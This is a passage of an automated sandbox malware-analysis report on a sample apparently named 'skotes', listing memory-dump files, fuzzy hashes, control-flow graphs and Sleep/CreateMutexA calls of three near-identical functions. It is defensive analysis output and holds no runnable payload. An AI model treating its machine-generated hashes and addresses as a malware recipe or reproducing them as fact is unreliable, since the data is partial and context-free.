                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310963193.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310981224.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310998973.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311018419.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311037778.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311052250.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311068907.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311087153.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311110738.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311128832.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311148034.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311166818.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311184463.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311206565.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311221539.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311240106.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311255567.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311255567.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311306441.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311320909.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311337615.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311352481.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311374544.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311396158.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CreateMutexSleep
                                                                                                                                                                                                                                          • String ID: T2o
                                                                                                                                                                                                                                          • API String ID: 1464230837-2760472518
                                                                                                                                                                                                                                          • Opcode ID: 39b0532c68d778586eefcf8bad412da76e1c7c11fbd42c2ffe3f0221e999a01c
                                                                                                                                                                                                                                          • Instruction ID: 0366bde5049348e4328e7ed5e6fbe9330464c02b07133d7c8249da831b4bcde5
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 39b0532c68d778586eefcf8bad412da76e1c7c11fbd42c2ffe3f0221e999a01c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 90312931A04144CBEF08ABBCDCC976DBAABABC2314F24425CE1149BBD5CB755A818761
                                                                                                                                                                                                                                          Function 00699F44 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137sleepsynchronizationCOMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 22 699f44-699f64 26 699f92-699fae 22->26 27 699f66-699f72 22->27 30 699fdc-699ffb 26->30 31 699fb0-699fbc 26->31 28 699f88-699f8f call 6ad663 27->28 29 699f74-699f82 27->29 28->26 29->28 32 69a92b 29->32 36 69a029-69a916 call 6a80c0 30->36 37 699ffd-69a009 30->37 34 699fbe-699fcc 31->34 35 699fd2-699fd9 call 6ad663 31->35 39 69a953-69a994 Sleep CreateMutexA 32->39 40 69a92b call 6c6c6a 32->40 34->32 34->35 35->30 43 69a00b-69a019 37->43 44 69a01f-69a026 call 6ad663 37->44 52 69a9a7-69a9a8 39->52 53 69a996-69a998 39->53 40->39 43->32 43->44 44->36 53->52 54 69a99a-69a9a5 53->54 54->52
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Sleep.KERNELBASE(00000064), ref: 0069A963
                                                                                                                                                                                                                                          • CreateMutexA.KERNELBASE(00000000,00000000,006F3254), ref: 0069A981
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2310380497.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310362606.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310380497.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310440680.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310459821.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310480195.0000000000707000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310578878.0000000000861000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310597404.0000000000863000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310616397.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310632940.000000000087E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310649956.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310649956.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310689049.000000000088D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310708966.000000000088E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310726399.0000000000891000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310744767.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310761898.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310779161.00000000008A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310802669.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310817843.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310836503.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310851449.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310868842.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310884881.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310908123.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310925434.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310943679.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310963193.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310981224.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310998973.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311018419.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311037778.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311052250.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311068907.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311087153.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311110738.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311128832.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311148034.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311166818.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311184463.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311206565.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311221539.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311240106.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311255567.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311255567.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311306441.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311320909.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311337615.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311352481.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311374544.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311396158.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CreateMutexSleep
                                                                                                                                                                                                                                          • String ID: T2o
                                                                                                                                                                                                                                          • API String ID: 1464230837-2760472518
                                                                                                                                                                                                                                          • Opcode ID: 2ae36c2484c830ec114aedf246bd3fecda75918ccc23fa0042c2d94511840f15
                                                                                                                                                                                                                                          • Instruction ID: 6edad8b0eeeb0b0f905f4b8abfac682e62a55559cc002568533095b67b3b227c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2ae36c2484c830ec114aedf246bd3fecda75918ccc23fa0042c2d94511840f15
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5F3127316001448BFF089BACCC887ACBAA7EBC5314F20461CE414DBBD5CB7559818762
                                                                                                                                                                                                                                          Function 0069A079 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 136sleepsynchronizationCOMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 56 69a079-69a099 60 69a09b-69a0a7 56->60 61 69a0c7-69a0e3 56->61 64 69a0a9-69a0b7 60->64 65 69a0bd-69a0c4 call 6ad663 60->65 62 69a111-69a130 61->62 63 69a0e5-69a0f1 61->63 68 69a15e-69a916 call 6a80c0 62->68 69 69a132-69a13e 62->69 66 69a0f3-69a101 63->66 67 69a107-69a10e call 6ad663 63->67 64->65 70 69a930-69a994 call 6c6c6a Sleep CreateMutexA 64->70 65->61 66->67 66->70 67->62 74 69a140-69a14e 69->74 75 69a154-69a15b call 6ad663 69->75 86 69a9a7-69a9a8 70->86 87 69a996-69a998 70->87 74->70 74->75 75->68 87->86 88 69a99a-69a9a5 87->88 88->86
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Sleep.KERNELBASE(00000064), ref: 0069A963
                                                                                                                                                                                                                                          • CreateMutexA.KERNELBASE(00000000,00000000,006F3254), ref: 0069A981
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2310380497.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310362606.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310380497.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310440680.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310459821.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310480195.0000000000707000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310578878.0000000000861000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310597404.0000000000863000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310616397.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310632940.000000000087E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310649956.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310649956.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310689049.000000000088D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310708966.000000000088E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310726399.0000000000891000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310744767.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310761898.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310779161.00000000008A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310802669.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310817843.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310836503.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310851449.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310868842.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310884881.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310908123.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310925434.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310943679.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310963193.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310981224.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310998973.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311018419.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311037778.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311052250.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311068907.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311087153.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311110738.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311128832.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311148034.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311166818.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311184463.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311206565.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311221539.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311240106.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311255567.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311255567.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311306441.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311320909.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311337615.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311352481.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311374544.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311396158.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CreateMutexSleep
                                                                                                                                                                                                                                          • String ID: T2o
                                                                                                                                                                                                                                          • API String ID: 1464230837-2760472518
                                                                                                                                                                                                                                          • Opcode ID: 87522d06c81f2c95ece0958fd1a9a90da034b371720cff7325fe8669ce662750
                                                                                                                                                                                                                                          • Instruction ID: d6afdf63be37c47740ace464d3a551eb400c0aade0f9f0818c8a3d45999f8526
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 87522d06c81f2c95ece0958fd1a9a90da034b371720cff7325fe8669ce662750
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 81312A31B101449BFF089BFCCD85B6DBBA7EBC1314F244218E1149BBD5CB7559818796
                                                                                                                                                                                                                                          Function 0069A1AE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 135sleepsynchronizationCOMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 90 69a1ae-69a1ce 94 69a1fc-69a218 90->94 95 69a1d0-69a1dc 90->95 96 69a21a-69a226 94->96 97 69a246-69a265 94->97 98 69a1de-69a1ec 95->98 99 69a1f2-69a1f9 call 6ad663 95->99 102 69a228-69a236 96->102 103 69a23c-69a243 call 6ad663 96->103 104 69a293-69a916 call 6a80c0 97->104 105 69a267-69a273 97->105 98->99 100 69a935 98->100 99->94 107 69a953-69a994 Sleep CreateMutexA 100->107 108 69a935 call 6c6c6a 100->108 102->100 102->103 103->97 111 69a289-69a290 call 6ad663 105->111 112 69a275-69a283 105->112 120 69a9a7-69a9a8 107->120 121 69a996-69a998 107->121 108->107 111->104 112->100 112->111 121->120 122 69a99a-69a9a5 121->122 122->120
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Sleep.KERNELBASE(00000064), ref: 0069A963
                                                                                                                                                                                                                                          • CreateMutexA.KERNELBASE(00000000,00000000,006F3254), ref: 0069A981
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2310380497.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310362606.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310380497.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310440680.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310459821.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310480195.0000000000707000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310578878.0000000000861000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310597404.0000000000863000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310616397.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310632940.000000000087E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310649956.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310649956.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310689049.000000000088D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310708966.000000000088E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310726399.0000000000891000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310744767.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310761898.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310779161.00000000008A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310802669.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310817843.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310836503.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310851449.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310868842.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310884881.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310908123.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310925434.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310943679.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310963193.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310981224.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310998973.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311018419.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311037778.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311052250.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311068907.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311087153.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311110738.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311128832.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311148034.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311166818.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311184463.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311206565.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311221539.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311240106.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311255567.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311255567.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311306441.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
